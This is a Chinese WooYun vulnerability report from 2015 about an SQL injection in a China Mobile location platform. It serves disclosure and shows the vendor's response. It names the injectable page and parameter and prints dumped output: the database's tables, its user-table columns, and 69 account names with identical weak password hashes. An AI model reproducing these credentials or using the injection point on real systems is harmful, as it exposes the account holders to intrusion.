当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139644

漏洞标题:中国移动无线城市位置应用平台存在SQL注入漏洞

相关厂商:中国移动

漏洞作者: qglfnt

提交时间:2015-09-10 11:26

修复时间:2015-10-26 14:04

公开时间:2015-10-26 14:04

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开

简要描述:

RT

详细说明:

SQL注入:**.**.**.**/KnowladgeCenter/MsgView.aspx?id=5

漏洞证明:

当前库

20150907232821.png


所有库

20150907232910.png



Database: vms
[58 tables]
+----------------------+
| LocationHistorys |
| Locations |
| NewestLocations |
| Suppliers |
| Vehicle_admin_info |
| Vehicle_contact_info |
| VmsActiveVehicles |
| VmsApplyForms |
| VmsArea |
| VmsAreaApprove |
| VmsCompany |
| VmsDepartments |
| VmsDrivers |
| VmsFlowDefines |
| VmsFlowDetails |
| VmsFlows |
| VmsKnowledges |
| VmsMenus |
| VmsMobilePower |
| VmsMoblieMenu |
| VmsMonitorPower |
| VmsPoints |
| VmsProcessFlow |
| VmsProcessNode |
| VmsProcessTemplate |
| VmsRoads |
| VmsRoleInMenus |
| VmsRoles |
| VmsSystemConfig |
| VmsTasks |
| VmsUserInRoles |
| VmsUserSpecials |
| VmsUsers |
| VmsVehState |
| VmsVehicleTypes |
| VmsVehicles |
| VmsWatchs |
| accountToRole |
| account_info |
| baseStations |
| department |
| dispatch_info |
| employee_info |
| menu_info |
| repair_company |
| repair_cost |
| role_info |
| travel_cost |
| vehicle_DailyMlg |
| vehicle_accident |
| vehicle_change |
| vehicle_energy |
| vehicle_info |
| vehicle_items |
| vehicle_mil_logs |
| vehicle_mileage |
| vehicle_repair |
| vmsuserback |
+----------------------+


字段

Database: vms
Table: VmsUsers
[12 columns]
+------------+---------+
| Column | Type |
+------------+---------+
| CmpId | int |
| vcId | int |
| VuDpId | int |
| VuEmail | varchar |
| VuId | int |
| VuName | varchar |
| VuPassword | varchar |
| VuPhone | varchar |
| VuPY | varchar |
| VuRemark | varchar |
| VuTrueName | varchar |
| VuVrId | int |
+------------+---------+


帐号信息

Database: vms
Table: VmsUsers
[69 entries]
+------+--------+----------------------------------+
| VuId | VuName | VuPassword |
+------+--------+----------------------------------+
| 273 | system | C4CA4238A0B923820DCC509A6F75849B |
| 294 | zb | C4CA4238A0B923820DCC509A6F75849B |
| 295 | yly | C4CA4238A0B923820DCC509A6F75849B |
| 296 | wx | C4CA4238A0B923820DCC509A6F75849B |
| 297 | admin | C4CA4238A0B923820DCC509A6F75849B |
| 298 | wxf | C4CA4238A0B923820DCC509A6F75849B |
| 299 | zsy | C4CA4238A0B923820DCC509A6F75849B |
| 300 | wxj | C4CA4238A0B923820DCC509A6F75849B |
| 301 | lwx | C4CA4238A0B923820DCC509A6F75849B |
| 302 | lyq | C4CA4238A0B923820DCC509A6F75849B |
| 304 | sp | C4CA4238A0B923820DCC509A6F75849B |
| 305 | zz | C4CA4238A0B923820DCC509A6F75849B |
| 306 | tx | C4CA4238A0B923820DCC509A6F75849B |
| 307 | zzx | C4CA4238A0B923820DCC509A6F75849B |
| 308 | dl | C4CA4238A0B923820DCC509A6F75849B |
| 309 | xly | C4CA4238A0B923820DCC509A6F75849B |
| 311 | tm | C4CA4238A0B923820DCC509A6F75849B |
| 316 | lj | C4CA4238A0B923820DCC509A6F75849B |
| 317 | fgy | C4CA4238A0B923820DCC509A6F75849B |
| 318 | tym | C4CA4238A0B923820DCC509A6F75849B |
| 319 | ly | C4CA4238A0B923820DCC509A6F75849B |
| 320 | zx | C4CA4238A0B923820DCC509A6F75849B |
| 321 | lq | C4CA4238A0B923820DCC509A6F75849B |
| 322 | wln | C4CA4238A0B923820DCC509A6F75849B |
| 323 | chm | C4CA4238A0B923820DCC509A6F75849B |
| 324 | wgx | C4CA4238A0B923820DCC509A6F75849B |
| 325 | lyl | C4CA4238A0B923820DCC509A6F75849B |
| 326 | zlx | C4CA4238A0B923820DCC509A6F75849B |
| 327 | lm | C4CA4238A0B923820DCC509A6F75849B |
| 328 | ltf | C4CA4238A0B923820DCC509A6F75849B |
| 329 | cs | C4CA4238A0B923820DCC509A6F75849B |
| 330 | zyb | C4CA4238A0B923820DCC509A6F75849B |
| 331 | ljp | C4CA4238A0B923820DCC509A6F75849B |
| 332 | fh | C4CA4238A0B923820DCC509A6F75849B |
| 333 | hsm | C4CA4238A0B923820DCC509A6F75849B |
| 334 | fxd | C4CA4238A0B923820DCC509A6F75849B |
| 335 | lhf | C4CA4238A0B923820DCC509A6F75849B |
| 336 | zw | C4CA4238A0B923820DCC509A6F75849B |
| 338 | wg | C4CA4238A0B923820DCC509A6F75849B |
| 339 | shw | C4CA4238A0B923820DCC509A6F75849B |
| 340 | gqs | C4CA4238A0B923820DCC509A6F75849B |
| 341 | lxp | C4CA4238A0B923820DCC509A6F75849B |
| 342 | ljd | C4CA4238A0B923820DCC509A6F75849B |
| 343 | zxp | C4CA4238A0B923820DCC509A6F75849B |
| 344 | db | C4CA4238A0B923820DCC509A6F75849B |
| 345 | ysc | C4CA4238A0B923820DCC509A6F75849B |
| 346 | pxb | C4CA4238A0B923820DCC509A6F75849B |
| 347 | wyf | C4CA4238A0B923820DCC509A6F75849B |
| 348 | lyk | C4CA4238A0B923820DCC509A6F75849B |
| 349 | wyw | C4CA4238A0B923820DCC509A6F75849B |
| 350 | zwr | C4CA4238A0B923820DCC509A6F75849B |
| 351 | wg | C4CA4238A0B923820DCC509A6F75849B |
| 352 | fxy | C4CA4238A0B923820DCC509A6F75849B |
| 353 | zws | C4CA4238A0B923820DCC509A6F75849B |
| 354 | lp | C4CA4238A0B923820DCC509A6F75849B |
| 355 | wgm | C4CA4238A0B923820DCC509A6F75849B |
| 356 | slw | C4CA4238A0B923820DCC509A6F75849B |
| 357 | gq | C4CA4238A0B923820DCC509A6F75849B |
| 358 | yw | C4CA4238A0B923820DCC509A6F75849B |
| 359 | xc | C4CA4238A0B923820DCC509A6F75849B |
| 360 | gby | C4CA4238A0B923820DCC509A6F75849B |
| 361 | czj | C4CA4238A0B923820DCC509A6F75849B |
| 362 | sjl | C4CA4238A0B923820DCC509A6F75849B |
| 363 | gjs | C4CA4238A0B923820DCC509A6F75849B |
| 364 | lsz | C4CA4238A0B923820DCC509A6F75849B |
| 365 | wjb | C4CA4238A0B923820DCC509A6F75849B |
| 366 | hqs | C4CA4238A0B923820DCC509A6F75849B |
| 367 | yzc | C4CA4238A0B923820DCC509A6F75849B |
| 368 | jzy | C4CA4238A0B923820DCC509A6F75849B |
+------+--------+----------------------------------+

修复方案:

过滤参数

版权声明:转载请注明来源 qglfnt@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-11 14:03

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无